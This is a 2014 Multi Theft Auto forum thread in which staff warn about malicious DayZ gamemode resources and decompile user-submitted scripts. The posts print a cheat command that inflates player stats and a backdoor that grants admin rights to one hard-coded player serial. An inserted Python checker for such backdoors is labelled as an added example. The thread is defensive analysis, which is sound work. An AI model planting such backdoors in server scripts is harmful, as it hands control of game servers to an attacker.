ccw (MTA Team) Posted May 3, 2014

It has come to our attention that a malicious script targeting the MTA DayZ gamemode is in circulation.

If you are an owner of a server running the MTA DayZ gamemode, then you must update your MTA server to the latest build (1.3.5-9.06371).

Linux binaries from here: http://linux.multitheftauto.com/
Windows binaries from here: http://www.mtasa.com/

If you play on a server running the MTA DayZ gamemode, you can check the server version by using the command sver in the client console. If the server build is below 6371, nag the owner to update!

Quited Posted May 3, 2014

What malicious scripts? Do you mean cheats, or a script that uses redirectPlayer to redirect players to other servers? And what is this serial?

    AddBlockedFileReason( "5A5FD6E08D503A125C81BA26594B416A", "Malicious" );

* From the CResourceManager.cpp file.

Woovie Posted May 3, 2014

> What malicious scripts? Do you mean cheats, or a script that uses redirectPlayer to redirect players to other servers? And what is this serial?
>
>     AddBlockedFileReason( "5A5FD6E08D503A125C81BA26594B416A", "Malicious" );
>
> * From the CResourceManager.cpp file.

That's the serial of someone who was doing something bad, pretty obvious with the word "Malicious".

The script had functions that did a range of things, from giving items to player teleporting, but the only visible function was one that gave you a list of cars. It was a popular script for MTA DayZ servers so that admins could keep track of stuff.

Lawliet Posted May 3, 2014

> It has come to our attention that a malicious script targeting the MTA DayZ gamemode is in circulation.

What exactly does "script" mean in this regard? Is it a resource you can enable/disable at any time or is it a third party program which exclusively targets MTA DayZ? Also, what exactly is said script trying to accomplish? Do I have to worry about compromised passwords, usernames, resources etc? Is this announcement an extension to this post by Woovie?

EDIT: I see that Woovie has already answered my questions. We never used that particular resource, so we don't have to worry about anything... but rest assured, we will still update to the latest version once it's available for us.

Quited Posted May 3, 2014 (edited)

> That's the serial of someone who was doing something bad, pretty obvious with the word "Malicious".

OK, I have most serials doing something bad in MTA. And this serial, 5A5FD6E08D503A125C81BA26594B416A, is it in the blacklist?

Edited May 3, 2014 by Guest

Woovie Posted May 3, 2014

Yeah, that's why it was added to the source code ._. I thought that was pretty obvious. We have no reason otherwise to add someone to the source code.

Dutchman101 (MTA Anti-Cheat Team) Posted May 3, 2014

> Yeah, that's why it was added to the source code ._. I thought that was pretty obvious. We have no reason otherwise to add someone to the source code.

It's not someone's serial. It's a hash of the malicious files (resource) so that MTA recognizes it.

Quited Posted May 3, 2014

> It's not someone's serial. It's a hash of the malicious files (resource) so that MTA recognizes it.

OK, if somebody can upload malicious resources on community, he can upload more and more, even if he gets banned.

Woovie Posted May 3, 2014

>> It's not someone's serial. It's a hash of the malicious files (resource) so that MTA recognizes it.
>
> OK, if somebody can upload malicious resources on community, he can upload more and more, even if he gets banned.

Can you just stop posting?

TheNormalnij Posted May 6, 2014

http://pastebin.com/3uK5ixkG

You can not monitor all malicious resources...

Gallagher Posted May 23, 2014

Hello! I found this MTA DayZ script. It is compiled and has an addCommandHandler in it. I think it can do harm to the server; can you check it for me?

https://dl.dropboxusercontent.com/s/6ga ... 1400759763

Jusonex Posted May 23, 2014

Yep, looks like that:

    function giveALLNOOBS()
      setElementData(getLocalPlayer(), "blood", 99999999999999)
      setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999)
      setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999)
    end
    addCommandHandler("mamka", giveALLNOOBS)

Gallagher Posted May 23, 2014

> Yep, looks like that:
>
>     function giveALLNOOBS()
>       setElementData(getLocalPlayer(), "blood", 99999999999999)
>       setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999)
>       setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999)
>     end
>     addCommandHandler("mamka", giveALLNOOBS)

I need to use this script. Could you delete this scam and send me the file?

Jusonex Posted May 23, 2014

That's the decompiled Lua script:

    function load()
      for _FORV_3_, _FORV_4_ in pairs(_UPVALUE0_) do
        tex = engineLoadTXD("mods/" .. _FORV_4_.fileName .. ".txd", _FORV_4_.model)
        engineImportTXD(tex, _FORV_4_.model)
        mod = engineLoadDFF("mods/" .. _FORV_4_.fileName .. ".dff", _FORV_4_.model)
        engineReplaceModel(mod, _FORV_4_.model)
        txd = engineLoadTXD("mods/1.txd", 2726)
        engineImportTXD(txd, 2726)
        dff = engineLoadDFF("mods/1.dff", 2726)
        engineReplaceModel(dff, 2726)
        txd = engineLoadTXD("mods/2.txd", 2725)
        engineImportTXD(txd, 2725)
        dff = engineLoadDFF("mods/2.dff", 2725)
        engineReplaceModel(dff, 2725)
        txd = engineLoadTXD("mods/3.txd", 2644)
        engineImportTXD(txd, 2644)
        dff = engineLoadDFF("mods/3.dff", 2644)
        engineReplaceModel(dff, 2644)
        txd = engineLoadTXD("mods/4.txd", 2708)
        engineImportTXD(txd, 2708)
        dff = engineLoadDFF("mods/4.dff", 2708)
        engineReplaceModel(dff, 2708)
        txd = engineLoadTXD("mods/5.txd", 2571)
        engineImportTXD(txd, 2571)
        dff = engineLoadDFF("mods/5.dff", 2571)
        engineReplaceModel(dff, 2571)
        txd = engineLoadTXD("mods/6.txd", 2568)
        engineImportTXD(txd, 2568)
        dff = engineLoadDFF("mods/6.dff", 2568)
        engineReplaceModel(dff, 2568)
        txd = engineLoadTXD("mods/7.txd", 2565)
        engineImportTXD(txd, 2565)
        dff = engineLoadDFF("mods/7.dff", 2565)
        engineReplaceModel(dff, 2565)
        txd = engineLoadTXD("mods/8.txd", 2468)
        engineImportTXD(txd, 2468)
        dff = engineLoadDFF("mods/8.dff", 2468)
        engineReplaceModel(dff, 2468)
        txd = engineLoadTXD("mods/9.txd", 2562)
        engineImportTXD(txd, 2562)
        dff = engineLoadDFF("mods/9.dff", 2562)
        engineReplaceModel(dff, 2562)
      end
    end
    addEventHandler("onClientResourceStart", resourceRoot, function()
      setTimer(load, 1000, 1)
    end)
    function giveALLNOOBS()
      setElementData(getLocalPlayer(), "blood", 99999999999999)
      setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999)
      setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999)
    end
    addCommandHandler("mamka", giveALLNOOBS)

Gallagher Posted May 23, 2014

> That's the decompiled Lua script: [...]

thank you friend

StreetPunkRulez Posted June 4, 2014

I heard there is another version of this hack with an included bypass of that detection method.

Woovie Posted June 4, 2014

> I heard there is another version of this hack with an included bypass of that detection method.

1. This isn't a hack, it's a resource...
2. They can't bypass our "detection" since it's a script. Any compiled script we can decompile to check for these types of issues.

Gallagher Posted June 20, 2014

Hello! I use this resource on my server for DayZ, but I think it has something malicious. Can you verify?

https://mega.co.nz/#!nlB2gBQZ!u7Qr9JqZb ... bIVRWBw3Yg

Jusonex Posted June 21, 2014

It contains a backdoor:

    function get(player)
      if getPlayerSerial(player) == "DFD1A04C59E7CB85FF672E4CC759F9F4" then
        setElementData(player, "adminn", true)
      else
        cancelEvent()
      end
    end
    addCommandHandler("neves768m", get)

Apart from that it's very insecure (excessive usage of element datas etc.) so I wouldn't recommend you to use it on your server.

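A static triage pass for the kind of backdoor shown in the post above, as an added example that is not part of the thread or of MTA's own tooling: it flags hard-coded serial comparisons, command handlers the server owner has not documented, and compiled files that must be decompiled before review. `audit_script`, the rule names and the constructed samples are hypothetical, only the standard Lua bytecode header is checked, and pattern matching like this is a review aid, not proof that a resource is clean.

```python
import re

# Standard Lua bytecode begins with ESC "Lua"; it cannot be reviewed as text.
LUA_BYTECODE_MAGIC = b"\x1bLua"
# A quoted run of 32 hex digits, the shape of the serial in the backdoor above.
HEX32 = re.compile(r"""["']([0-9A-Fa-f]{32})["']""")
SERIAL_CALL = re.compile(r"\bgetPlayerSerial\s*\(")
COMMAND = re.compile(r"""\baddCommandHandler\s*\(\s*["']([^"']+)["']""")
ELEMENT_DATA = re.compile(r"""\bsetElementData\s*\([^,]+,\s*["']([^"']+)["']""")

def audit_script(name, data, documented_commands=()):
    """Return (rule, detail) findings for one resource script given as bytes."""
    if data.startswith(LUA_BYTECODE_MAGIC):
        return [("compiled", name + ": bytecode, decompile before trusting")]
    text = data.decode("utf-8", errors="replace")
    findings = []
    # A literal serial only matters when the script also reads player serials.
    if SERIAL_CALL.search(text):
        findings += [("hardcoded-serial", s) for s in HEX32.findall(text)]
    # Commands the server owner cannot account for deserve a manual look.
    findings += [("undocumented-command", c) for c in COMMAND.findall(text)
                 if c not in documented_commands]
    # List every element data key the script writes, for manual review.
    findings += [("element-data-write", k) for k in ELEMENT_DATA.findall(text)]
    return findings

# The backdoor quoted in the post above, reformatted.
SAMPLE_BACKDOOR = b'''
function get(player)
  if getPlayerSerial(player) == "DFD1A04C59E7CB85FF672E4CC759F9F4" then
    setElementData(player, "adminn", true)
  else
    cancelEvent()
  end
end
addCommandHandler("neves768m", get)
'''
# Constructed benign script and constructed bytecode stub (header bytes only).
SAMPLE_BENIGN = b'''
function listCars(player)
  outputChatBox("cars: 3", player)
end
addCommandHandler("cars", listCars)
'''
SAMPLE_COMPILED = b"\x1bLuaQ\x00\x01\x04"

if __name__ == "__main__":
    for label, blob in [("backdoor.lua", SAMPLE_BACKDOOR),
                        ("cars.lua", SAMPLE_BENIGN), ("mods.luac", SAMPLE_COMPILED)]:
        print(label, audit_script(label, blob, documented_commands=("cars",)))
```
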
lopezloo Posted June 21, 2014

Eh, guys like the author of this script should be globally banned by serial.

Gallagher Posted June 21, 2014 (edited)

wow

Edited June 22, 2014 by Guest

Jusonex Posted June 21, 2014

Server: http://pastebin.com/L702uDts
Client: http://pastebin.com/qkJbAw7s

Atton Posted July 20, 2014

Yet another good reason to make encrypted work exclusively on one server

http://pastebin.com/gBV2FHjW

MrBugsFive Posted February 7, 2015

Hello? You Check Here Files ??

http://www.mediafire.com/download/iz2fu ... ves768.rar
Pass: neves768.com

!! Please Check is Secure !! (File Create By Neves768 What Banned/Blocked of Forum by Script Malicious !!) @Jusonex
